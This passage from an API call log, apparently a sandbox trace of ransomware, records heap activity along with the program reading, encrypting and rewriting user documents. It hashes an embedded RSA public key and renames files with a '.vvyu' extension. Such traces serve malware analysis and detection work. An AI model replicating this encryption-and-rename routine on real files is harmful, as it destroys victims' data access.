Size=0x2c) returned 0x2cd95d8 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.207] GetCurrentThreadId () returned 0x66c [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2af8 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b40 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b28 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a98 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e28 | out: hHeap=0x620000) returned 1 [0194.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.219] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x147d7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x147d7, lpOverlapped=0x0) returned 1 [0194.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.220] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x147dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.220] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.222] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.222] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.222] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.222] CloseHandle (hObject=0x568) returned 1 [0194.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea3a68 [0194.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.225] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\wnP_mIiKwB9aJXHHeZ.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\wnp_miikwb9ajxhhez.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\wnP_mIiKwB9aJXHHeZ.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\wnp_miikwb9ajxhhez.ots.vvyu")) returned 1 [0194.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.227] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.229] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50102050, ftCreationTime.dwHighDateTime=0x1d89cfe, ftLastAccessTime.dwLowDateTime=0xa2688630, ftLastAccessTime.dwHighDateTime=0x1d8a159, ftLastWriteTime.dwLowDateTime=0xa2688630, ftLastWriteTime.dwHighDateTime=0x1d8a159, nFileSizeHigh=0x0, nFileSizeLow=0x54eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z1NiZTMoyaVazPqQ.rtf", cAlternateFileName="Z1NIZT~1.RTF")) returned 1 [0194.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0e28 [0194.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0194.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e28 | out: hHeap=0x620000) returned 1 [0194.230] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Z1NiZTMoyaVazPqQ.rtf") returned=".rtf" [0194.230] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Z1NiZTMoyaVazPqQ.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\z1niztmoyavazpqq.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.230] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=21739) returned 1 [0194.230] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.234] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x54c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.234] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.236] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.236] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x54eb, lpOverlapped=0x0) returned 1 [0194.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.237] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.238] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.238] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.238] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.238] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.238] GetLastError () returned 0x0 [0194.238] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.238] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.239] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.239] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.239] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54f0) returned 0x2ea79b0 [0194.239] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0e28 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0e70 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.240] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ae0 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ab0 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.241] HeapFree (in: 